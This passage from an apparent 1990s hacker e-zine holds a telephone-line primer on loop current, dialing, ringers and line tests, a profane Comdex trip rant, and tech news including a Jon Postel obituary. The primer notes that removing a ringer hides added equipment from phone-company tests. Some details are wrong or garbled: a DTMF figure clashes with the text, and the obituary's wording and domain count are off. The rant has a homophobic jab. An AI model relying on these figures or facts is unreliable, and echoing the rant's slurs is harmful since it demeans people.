exchange; in the United States, this relay is known as the "A"
relay (see fig.1). The resistance of each of these chokes is 200
Ohms.

We can find out how well a phone line is operating by using
Ohm's law and an ammeter. The DC resistance of any device
attached to the phone line is often quoted in telephone company
specifications as 200 Ohms; this will vary in practice from
between 150 to 1,000 Ohms. You can measure the DC resistance of
your phone with an Ohmmeter. Note this is DC resistance, not
impedance.


Using these figures you can estimate the distance between
your telephone and the telephone exchange. In the United States,
the telephone company guarantees you no lower current than 20 mA
- or what is known to your phone company as a "long loop." A
"short loop" will draw 50 to 70 mA, and an average loop, about 35
mA. Some countries will consider their maximum loop as low as 12
mA. In practice, United States telephones are usually capable of
working at currents as low as 14 mA. Some exchanges will
consider your phone in use and feed dial tone down the line with
currents as low as 8 mA, even though the telephone may not be
able to operate.

Although the telephone company has supplied plenty of nice
clean DC direct to your home, don't assume you have a free
battery for your own circuits. The telephone company wants the
DC resistance of your line to be about 10 megOhms when there's no
apparatus in use ("on hook," in telephone company jargon); you
can draw no more than 5 microamperes while the phone is in that
state. When the phone is in use, or "off hook," you can draw
current, but you will need that current to power your phone, any
current you might draw for other purposes would tend to lower the
signal level.

The phone line has an impedance composed of distributed
resistance, capacitance, and inductance. The impedance will vary
according to the length of the loop, the type of insulation of
the wire, and whether the wire is aerial cable, buried cable, or
bare parallel wires strung on telephone poles. For calculation
and specification purposes, the impedance is normally assumed to
be 600 to 900 Ohms. If the instrument attached to the phone line
should be of the wrong impedance, you would get a mismatch, or
what telephone company personnel refer to as "return loss."
(Radio Amateurs will recognize return loss as SWR.) A mismatch
on telephone lines results in echo and whistling, which the phone
company calls "singing" and owners of very cheap telephones may
have come to expect. A mismatched device can, by the way, be
matched to the phone line by placing resistors in parallel or
series with the line to bring the impedance of the device to
within the desired limits. This will cause some signal loss, of
course, but will make the device usable.

A phone line is balanced feed, with each side equally
balanced to ground. Any imbalance will introduce hum and noise
to the phone line and increase susceptibility to RFI.

The balance of the phone line is known to your telephone
company as "longitudinal balance." If both impedance match and
balance to ground are kept in mind, any device attached to the
phone line will perform well, just as the correct matching of
transmission lines and devices will ensure good performance in
radio practice.

If you live in the United States, the two phone wires
connected to your telephone should be red and green. (In other
parts of the world they may be different colors.) The red wire
is negative and the green wire is positive. Your telephone
company calls the green wire "Tip" and the red wire "Ring". (In
other parts of the world, these wires may be called "A" and "B".)
Most installations have another pair of wires, yellow and black.
These wires can be used for many different purposes, if they are
used at all. Some party lines use the yellow wire as a ground;
sometimes there's 6.8 VAC on this pair to light the dials of
Princess type phones. If you have two separate phone lines (not
extensions) in your home, you will find the yellow and black pair
carrying a second telephone line. In this case, black is "Tip"
and yellow is "Ring."

The above description applies to a standard line with a DC
connection between your end of the line and the telephone
exchange. Most phone lines in the world are of this type, known
as a "metallic line." In a metallic line, there may or may not
be inductance devices placed in the line to alter the frequency
response of the line; the devices used to do this are called
"loading coils." (Note: if they impair the operation of your
modem, your telephone company can remove them.) Other types of
lines are party lines, which may be metallic lines but require
special telephones to allow the telephone company to
differentiate between subscribers. Very long lines may have
amplifiers, sometimes called "loop extenders" on them. Some
telephone companies use a system called "subscriber carrier,"
which is basically an RF system in which your telephone signal is
heterodyned up to around 100 Khz and then sent along another
subscriber's "twisted pair."

If you have questions about your telephone line, you can
call your telephone company; depending on the company and who you
can reach, you may be able to obtain a wealth of information.


The Speech Network

The speech network - also known as the "hybrid" or the "two
wire/four wire network" - takes the incoming signal and feeds it
to the earpiece and takes the microphone output and feeds it down
the line. The standard network used all over the world is an LC
device with a carbon microphone; some newer phones use discrete
transistors or ICs.

One of the advantages of an LC network is that it has no
semiconductors, is not voltage sensitive, and will work
continuously as the voltage across the line is reduced. Many
transistorized phones stop working as the voltage approaches 3 to
4 Volts.

When a telephone is taken off the hook, the line voltage
drops from 48 Volts to between 9 and 3 Volts, depending on the
length of the loop. If another telephone in parallel is taken
off the hook, the current consumption of the line will remain the
same and the voltage across the terminals of both telephones will
drop. Bell Telephone specifications state that three telephones
should work in parallel on a 20 mA loop; transistorized phones
tend not to pass this test, although some manufacturers use ICs
that will pass. Although some European telephone companies claim
that phones working in parallel is "technically impossible," and
discourage attempts to make them work that way, some of their
telephones will work in parallel.

While low levels of audio may be difficult to hear, overly
loud audio can be painful. Consequently, a well designed
telephone will automatically adjust its transmit and receive
levels to allow for the attenuation - or lack of it - caused by
the length of the loop. This adjustment is called "loop
compensation." In the United States, telephone manufacturers
achieve this compensation with silicon carbide varistors that
consume any excess current from a short loop (see fig. 2).
Although some telephones using ICs have built-in loop
compensation, many do not; the latter have been designed to
provide adequate volume on the average loop, which means that
they provide low volume on long loops, and are too loud on short
loops. Various countries have different specifications for
transmit and receive levels; some European countries require a
higher transmit level than is standard in the United States so a
domestically-manufactured telephone may suffer from low transmit
level if used on European lines without modification.

Because a telephone is a duplex device, both transmitting
and receiving on the same pair of wires, the speech network must
ensure that not too much of the caller's voice is fed back into
his or her receiver. This function, called "sidetone," is
achieved by phasing the signal so that some cancellation occurs
in the speech network before the signal is fed to the receiver.
Callers faced with no sidetone at all will consider the phone
"dead." Too little sidetone will convince callers that they're
not being heard and cause them to shout, "I can hear you. Can
you hear ME?" Too much sidetone causes callers to lower their
voices and not be heard well at the other end of the line.

A telephone on a short loop with no loop compensation will
appear to have too much sidetone, and callers will lower their
voices. In this case, the percentage of sidetone is the same,
but as the overall level is higher the sidetone level will also
be higher.


The Dial

There are two types of dials in use around the world. The
most common one is called pulse, loop disconnect, or rotary; the
oldest form of dialing, it's been with us since the 1920's. The
other dialing method, more modern and much loved by Radio
Amateurs is called Touch-tone, Dual Tone Multi-Frequency (DTMF)
or Multi-Frequency (MF) in Europe. In the U.S. MF means single
tones used for system control.

Pulse dialing is traditionally accomplished with a rotary
dial, which is a speed governed wheel with a cam that opens and
closes a switch in series with your phone and the line. It works
by actually disconnecting or "hanging up" the telephone at
specific intervals. The United States standard is one disconnect
per digit, so if you dial a "1," your telephone is
"disconnected" once. Dial a seven and you'll be "disconnected"
seven times; dial a zero, and you'll "hang up " ten times. Some
countries invert the system so "1" causes ten "disconnects" and
0, one disconnect. Some add a digit so that dialing a 5 would
cause six disconnects and 0, eleven disconnects. There are even
some systems in which dialing 0 results in one disconnect, and
all other digits are plus one, making a 5 cause six disconnects
and 9, ten disconnects.

Although most exchanges are quite happy with rates of 6 to
15 Pulses Per Second (PPS), the phone company accepted standard
is 8 to 10 PPS. Some modern digital exchanges, free of the
mechanical inertia problems of older systems, will accept a PPS
rate as high as 20.

Besides the PPS rate, the dialing pulses have a make/break
ratio, usually described as a percentage, but sometimes as a
straight ratio. The North American standard is 60/40 percent;
most of Europe accepts a standard of 63/37 percent. This is the
pulse measured at the telephone, not at the exchange, where it's
somewhat different, having traveled through the phone line with
its distributed resistance, capacitance, and inductance. In
practice, the make/break ratio does not seem to affect the
performance of the dial when attached to a normal loop. Bear in
mind that each pulse is a switch connect and disconnect across a
complex impedance, so the switching transient often reaches 300
Volts. Try not to have your fingers across the line when
dialing.

Most pulse dialing phones produced today use a CMOS IC and a
keyboard. Instead of pushing your finger round in circles, then
removing your finger and waiting for the dial to return before
dialing the next digit, you punch the button as fast as you want.
The IC stores the number and pulses it out at the correct rate
with the correct make/break ratio and the switching is done with
a high-voltage switching transistor. Because the IC has already
stored the dialed number in order to pulse it out at the correct
rate, it's a simple matter for telephone designers to keep the
memory "alive" and allow the telephone to store, recall, and
redial the Last Number Dialed (LND). This feature enables you to
redial by picking up the handset and pushing just one button.

Because pulse dialing entails rapid connection and disconnection
of the phone line, you can "dial" a telephone that has lost its
dial, by hitting the hook-switch rapidly. It requires some
practice to do this with consistent success, but it can be done.
A more sophisticated approach is to place a Morse key in series
with the line, wire it as normally closed and send strings of
dots corresponding to the digits you wish to dial.

Touch tone, the most modern form of dialing, is fast and
less prone to error than pulse dialing. Compared to pulse, its
major advantage is that its audio band signals can travel down
phone lines further than pulse, which can travel only as far as
your local exchange. Touch-tone can therefore send signals
around the world via the telephone lines, and can be used to
control phone answering machines and computers. Pulse dialing is
to touch-tone as FSK or AFSK RTTY is to Switched Carrier RTTY,
where mark and space are sent by the presence or absence of DC or
unmodulated RF carrier. Most Radio Amateurs are familiar with
DTMF for controlling repeaters and for accessing remote and auto
phone patches.

Bell Labs developed DTMF in order to have a dialing system
that could travel across microwave links and work rapidly with
computer controlled exchanges. Each transmitted digit consists
of two separate audio tones that are mixed together (see fig.3).
The four vertical columns on the keypad are known as the high
group and the four horizontal rows as the low group; the digit 8
is composed of 1336 Hz and 852 Hz. The level of each tone is
within 3 dB of the other, (the telephone company calls this
"Twist"). A complete touch-tone pad has 16 digits, as opposed to
ten on a pulse dial. Besides the numerals 0 to 9, a DTMF "dial"
has *, #, A, B, C, and D. Although the letters are not normally
found on consumer telephones, the IC in the phone is capable of
generating them.

The * sign is usually called "star" or "asterisk." The #
sign, often referred to as the "pound sign." is actually called
an octothorpe. Although many phone users have never used these
digits - they are not, after all, ordinarily used in dialing
phone numbers - they are used for control purposes, phone
answering machines, bringing up remote bases, electronic banking,
and repeater control. The one use of the octothorpe that may be
familiar occurs in dialing international calls from phones in the
United States. After dialing the complete number, dialing the
octothorpe lets the exchange know you've finished dialing. It
can now begin routing your call; without the octothorpe, it would
wait and "time out" before switching your call.

When DTMF dials first came out they had complicated cams and
switches for selecting the digits and used a transistor
oscillator with an LC tuning network to generate the tones.
Modern dials use a matrix switch and a CMOS IC that synthesizes
the tones from a 3.57MHz (TV color burst) crystal. This
oscillator runs only during dialing, so it doesn't normally
produce QRM.

Standard DTMF dials will produce a tone as long as a key is
depressed. No matter how long you press, the tone will be
decoded as the appropriate digit. The shortest duration in which
a digit can be sent and decoded is about 100 milliseconds (ms).
It's pretty difficult to dial by hand at such a speed, but
automatic dialers can do it. A twelve-digit long distance number
can be dialed by an automatic dialer in a little more than a
second - about as long as it takes a pulse dial to send a single
0 digit.

The output level of DTMF tones from your telephone should be
between 0 and -12 dBm. In telephones, 0 dB is 1 miliwatt over
600 Ohms. So 0 dB is 0.775 Volts. Because your telephone is
considered a 600 Ohm load, placing a voltmeter across the line
will enable you to measure the level of your tones.


The Ringer

Simply speaking this is a device that alerts you to an
incoming call. It may be a bell, light, or warbling tone. The
telephone company sends a ringing signal which is an AC waveform.
Although the common frequency used in the United States is 20 HZ,
it can be any frequency between 15 and 68 Hz. Most of the world
uses frequencies between 20 and 40 Hz. The voltage at the
subscribers end depends upon loop length and number of ringers
attached to the line; it could be between 40 and 150 Volts. Note
that ringing voltage can be hazardous; when you're working on a
phone line, be sure at least one telephone on the line is off the
hook (in use); if any are not, take high voltage precautions.
The telephone company may or may not remove the 48 VDC during
ringing; as far as you're concerned, this is not important.
Don't take chances.

The ringing cadence - the timing of ringing to pause -
varies from company to company. In the United States the cadence
is normally 2 seconds of ringing to 4 seconds of pause. An
unanswered phone in the United States will keep ringing until the
caller hangs up. But in some countries, the ringing will "time
out" if the call is not answered.

The most common ringing device is the gong ringer, a
solenoid coil with a clapper that strikes either a single or
double bell. A gong ringer is the loudest signaling device that
is solely phone-line powered.

Modern telephones tend to use warbling ringers, which are
usually ICs powered by the rectified ringing signal. The audio
transducer is either a piezoceramic disk or a small loudspeaker
via a transformer.

Ringers are isolated from the DC of the phone line by a
capacitor. Gong ringers in the United States use a 0.47 uF
capacitor. Warbling ringers in the United States generally use a
1.0 uF capacitor. Telephone companies in other parts of the
world use capacitors between 0.2 and 2.0 uF. The paper
capacitors of the past have been replaced almost exclusively with
capacitors made of Mylar film. Their voltage rating is always
250 Volts.

The capacitor and ringer coil, or Zeners in a warbling
ringer, constitute a resonant circuit. When your phone is hung
up ("on hook") the ringer is across the line; if you have turned
off the ringer you have merely silenced the transducer, not
removed the circuit from the line.

When the telephone company uses the ringer to test the line,
it sends a low-voltage, low frequency signal down the line
(usually 2 Volts at 10 Hz) to test for continuity. The company
keeps records of the expected signals on your line. This is how
it can tell you have added equipment to your line. If your
telephone has had its ringer disconnected, the telephone company
cannot detect its presence on the line.

Because there is only a certain amount of current available
to drive ringers, if you keep adding ringers to your phone line
you will reach a point at which either all ringers will cease to
ring, some will cease to ring, or some ringers will ring weakly.
In the United States the phone company will guarantee to ring
five normal ringers. A normal ringer is defined as a standard
gong ringer as supplied in a phone company standard desk
telephone. Value given to this ringer is Ringer Equivalence
Number (REN) 1. If you look at the FCC registration label of
your telephone, modem, or other device to be connected to the
phone line, you'll see the REN number. It can be as high as 3.2,
which means that device consumes the equivalent power of 3.2
standard ringers, or 0.0, which means it consumes no current when
subjected to a ringing signal. If you have problems with
ringing, total up your RENs; if the total is greater than 5,
disconnect ringers until your REN is at 5 or below.

Other countries have various ways of expressing REN, and
some systems will handle no more than three of their standard
ringers. But whatever the system, if you add extra equipment and
the phones stop ringing, or the phone answering machine won't
pick up calls, the solution is disconnect ringers until the
problem is resolved. Warbling ringers tend to draw less current
than gong ringers, so changing from gong ringers to warbling
ringers may help you spread the sound better.

Frequency response is the second criterion by which a ringer
is described. In the United States most gong ringers are
electromechanically resonant. They are usually resonant at 20
and 30 Hz (+&- 3 Hz). The FCC refers to this as A so a normal
gong ringer is described as REN 1.0A. The other common frequency
response is known as type B. Type B ringers will respond to
signals between 15.3 and 68.0 Hz. Warbling ringers are all type
B and some United States gong ringers are type B. Outside the
United States, gong ringers appear to be non-frequency selective,
or type B.

Because a ringer is supposed to respond to AC waveforms, it
will tend to respond to transients (such as switching transients)
when the phone is hung up, or when the rotary dial is used on an
extension phone. This is called "bell tap" in the United States;
in other countries, it's often called "bell tinkle." While
European and Asian phones tend to bell tap, or tinkle, United
States ringers that bell tap are considered defective. The bell
tap is designed out of gong ringers and fine tuned with bias
springs. Warbling ringers for use in the United States are
designed not to respond to short transients; this is usually
accomplished by rectifying the AC and filtering it before it
powers the IC, then not switching on the output stage unless the
voltage lasts long enough to charge a second capacitor.


Conclusion

This brief primer describing the working parts of a
telephone is intended to provide a better understanding of phone
equipment. Note that most telephone regulatory agencies,
including the FCC, forbid modification of anything that has been
previously approved or attached to phone lines.

End of text. Figures Follow


. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

Fig 1. The Phone Line


A RELAY
200 Ohms Telephone . Subscriber
------- Exchange .
------- . TIP +
------~~~~~~~--o----------------------o
| 5 H | .
| | .
+| | .
--- | . No 22 AWG wire
--- 48V DC | . up to 10 Miles Long
- | .
--- A RELAY | .
-| 200 Ohms | .
| ------- | .
| ------- | . RING -
------~~~~~~~--|---------o------------o
5 H | | .
Audio 2uF | 2uF | .
coupling 250V --- 250V ---
Capacitors --- ---
| |
o----- \-------- |
|
A RELAY Contacts |
|
o----- \------------------


. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .


Fig 2. Telephone Speech Network.

Simplified U.S. Standard "425B". Component Values
may vary between manufacturers. Connections for Dials, Ringers
etc. not shown.

|-------------------|
..|...................|
. | .|
Sidetone balancing. | 0.047uF 250V .|
impedance & loop . | | | .|
compensation. >>> . o----| |-------o .|
. | | | | .|
. | | .|
. | |<| VR2 | .|
. o----| |-------o---.|
. | |>| |.|
. | |.|
. | 68 Ohms |.|
. o---\/\/\/-----| |.|
..|..............|..|.|
| | | |
| . | | |
-----)||(------|---------o (GN)
1)||(5 | | | |
Loop )||( | | | |
TIP Compensation 2)||(6 | | | |
o------ \------o---------)||(------o | | RX O
. | (RR) . || | | | |
. | || 1.5uF | | | |
. \ 180 || --- | | |
. / Ohms || --- | |----o (R)
. \ || 250V | | |
. | || | | |
. VR1 --- . || . | | |
. ^ ^ ----)||(------o--- TX O
. --- | 3)||(7 |
. | | )||( |
RING . | (C) | 4)||(8 22 Ohms |
o----- \-------o---------)||(---o----/\/\/---o (B)
| |
^ | |
Hookswitch ------------



. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

Fig. 3. Standard DTMF pad and Frequencies



(Low ____ ____ ____ ____
Group)| | | | | | | |
697Hz >| 1 | | 2 | | 3 | | A |
|____| |____| |____| |____|



____ ____ ____ ____
| | | | | | | |
770Hz >| 4 | | 5 | | 6 | | B |
|____| |____| |____| |____|



____ ____ ____ ____
| | | | | | | |
825Hz >| 7 | | 8 | | 9 | | C |
|____| |____| |____| |____|



____ ____ ____ ____
| | | | | | | |
941Hz >| * | | 0 | | # | | D |
|____| |____| |____| |____|

^ ^ ^ ^
1209Hz 1336Hz 1477Hz 1633Hz
(High Group)



===================================EOF===========================================

%%%%%%%%%%%%%%%%%%%%%%%%
\ Trip to Comdex \-<optiklenz>
%%%%%%%%%%%%%%%%%%%%%%%%


This is my RANT on Comdex. If you have a problem with it "please direct it to
that brick wall over there..."

Comdex 98 fuckin SUCKED!

DAY 1
Since things didn't go as planned I'll just give you a
synopsis on what went on the first day.

We started off (at 4:00 AM) going to pick up aphex, and
lasik, but it turns out that they left on their own. So
Calico, XiT, nhilisis, and I hauled ass to Vegas
ourselves. We spend 5hrs in the worlds largest fucken
oven. When at last we arrived at Vegas we checked into
the Mirage hotel, and were bound for the Las Vegas
Convention center at which Comdex was held. Finding a
parking space was fucken hell. We ended up parking
about 1mile away from the registration tent. Once we
got in we exhaustedly spent a lot of the afternoon at the
test center. We tested various devices one of the
mechanisms being the new Bay Stack 450 switch, and
then spent some time setting up slackware 3.4 on all
the subordinate half assed windows systems. After
fucking around with the computers for awhile we met up
with psychosis, and a a rep from ZDNET for an interview.
Then a little later we checked out all the different booths
(taking all the free shit we could get.) Then we checked
out the redhat booth (XiT took a copy of redhat 5.2 which
was later eventually used to simulate an imatation of a
UFO ) soon afterward we headed to the UUNET
Technologies booth. After hanging with the folks at
UUNET we headed back to the redhat linux booth to
laugh at the venders(they were sporting homosexual
little redish sherlock holmes hats. Damn commie
bastards) after poking fun we went over to the FreeBsd
booth. someone recognized the "Legions Interactive"
(LoU) on the name tags and gave us some BSD
shirts(which were otherwise $16, and a total rip off). We
got tired of walking around all day so we took a break.
While we were kicking back Calico decides to go fucken
camera crazy and starts flashing snap shots like he was
fucken filming a model. At any rate the camera got
taken away by some fuck nut security guard who didn't
want to be filmed. We argued with the asshole for about
10minutes before we resolved that it was a no win
predicament so we took off. Most of the Comdex footage
we got was on the other role of film. Whatever we ended
up with is posted below. And so concludes this years
trip to Comdex. We'll be back next year. Hopefully next
year more members can tag along (and don't
"inadvertently" leave without letting anyone know).


http://www.t00ned.org/optik/comdex

===================================EOF===========================================

%%%%%%%%%%%%%%%%%%%%%%%%
\ In the News \-<sources>
%%%%%%%%%%%%%%%%%%%%%%%%


**************|-*
* Network (mordern advances)
**************|-*

-----------------------------------------------------
Lucent Supports Novell's Directory
-----------------------------------------------------

Novell Inc., looking to solidify its position in directory services before Microsoft Corp.
Enters the market, last week continued to push its network management technology and lined
Up with what might be the first of many big time network equipment suppliers to back its
Offerings. Novell, at last week's networld+Interop conference, entered into a partnership
With Lucent Technologies Inc., under which the communications equipment manufacturer will
use Novell Directory Services (NDS) to increase policy based network controls in its high
capacity Cajun P550 Switch.


-----------------------------------------------------
Jon Postel: Internet Architect and Caretaker
-----------------------------------------------------
To have known him was a reverence
Our condolences go out to Jon's family.
-Legions Interactive - LoU
-----------------------------------------------------

[Brief History]
Jonathan B. Postel was a tantrum computer scientist who played a central role in developing and maintaining many of the Internets core technologies. Pastel who was 55 when he did in Oct was part of the team of engineers that in 1969, created the software for ARPAnet, the military research network that evolved into the Internet. He was best known for his role as head of the Internet Assigned Numbers Authority, the technical body that has overseen the Internet's Domain Name System (DNS) and allocated Internet Protocol (IP) addresses, the fundamental technologies for navigating and routing on the Net. Over the past two years, Postel and the IANA (www.iana.org) were in the midst of the stormy debate over the future of domain names. In 1996 Postel led an effort to introduce new top-level domains to the Internet, a proposal that attracted so much attention and resulted in such discord that the U.S. government which ahs legally retained authority over the Domain Name System- Intervened last year as an arbiter. Although he grew to notoriety through, IANA, Postel's more enduring contributions to the Internet are his technical achievements in helping to create and document the Internet's underlying technologies, including IP, and DNS.


Short Time Line--

1969- Jon Postel assists in the installation of the ARPAnet's first communications switch.
1984- A group of engineers agrees upon seven so-called top-level domains reflecting their
respective use: .gov, .net, .com, .org, edu, and .int.
1985- the first domain registered is symbolics.com on March 15
1988- The Internet Assigned Numbers Authority is started in December. Postel is appointed
Director. The organization allocates blocks of Internet addresses to interested
organizations.
1993- NSF requests proposals to run the .com, .net, .org, and .gov dns services known as
InterNIC. The contract is awarded to Network Solutions Inc.
1996- Postel proposes to the Internet society that new top-level domains be created.
Each of 50 registries would administer three of the new domains.
1998- Postel "redirects" five of the 12 Internet directory servers to get data about
where every domain name in the world is located from his machine at t

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT